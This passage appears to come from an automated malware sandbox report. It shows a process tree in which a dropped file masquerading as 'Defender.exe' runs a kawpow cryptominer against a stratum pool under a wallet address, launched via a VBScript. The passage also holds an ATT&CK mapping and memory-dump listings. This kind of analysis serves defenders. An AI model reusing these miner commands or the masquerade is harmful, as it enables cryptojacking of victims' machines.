        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1988
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/612-203-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/764-209-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/828-221-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/900-137-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1004-131-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1292-98-0x000000001BA40000-0x000000001BA41000-memory.dmp

Filesize
4KB

Download
memory/1292-86-0x0000000002620000-0x0000000002621000-memory.dmp

Filesize
4KB

Download
memory/1292-99-0x000000001B4D0000-0x000000001B4D1000-memory.dmp

Filesize
4KB

Download
memory/1292-87-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1292-114-0x000000001B660000-0x000000001B661000-memory.dmp

Filesize
4KB

Download
memory/1292-97-0x000000001AB70000-0x000000001AB71000-memory.dmp

Filesize
4KB

Download
memory/1292-84-0x000000001ABA0000-0x000000001ABA2000-memory.dmp

Filesize
8KB

Download
memory/1292-115-0x000000001B670000-0x000000001B671000-memory.dmp

Filesize
4KB

Download
memory/1292-82-0x00000000026D0000-0x00000000026D1000-memory.dmp

Filesize
4KB

Download
memory/1292-83-0x000000001AC20000-0x000000001AC21000-memory.dmp

Filesize
4KB

Download
memory/1292-102-0x000000001B580000-0x000000001B581000-memory.dmp

Filesize
4KB

Download
memory/1292-89-0x000000001C570000-0x000000001C571000-memory.dmp

Filesize
4KB

Download
memory/1292-85-0x000000001ABA4000-0x000000001ABA6000-memory.dmp

Filesize
8KB

Download
memory/1640-215-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1652-60-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp

Filesize
8KB

Download
memory/1672-179-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1712-143-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1772-125-0x0000000077800000-0x0000000077802000-memory.dmp

Filesize
8KB

Download
memory/1772-124-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1808-155-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1824-185-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1876-149-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1884-167-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1932-161-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/1936-197-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/2040-191-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download
memory/2044-173-0x0000000140000000-0x0000000141B19000-memory.dmp

Filesize
27.1MB

Download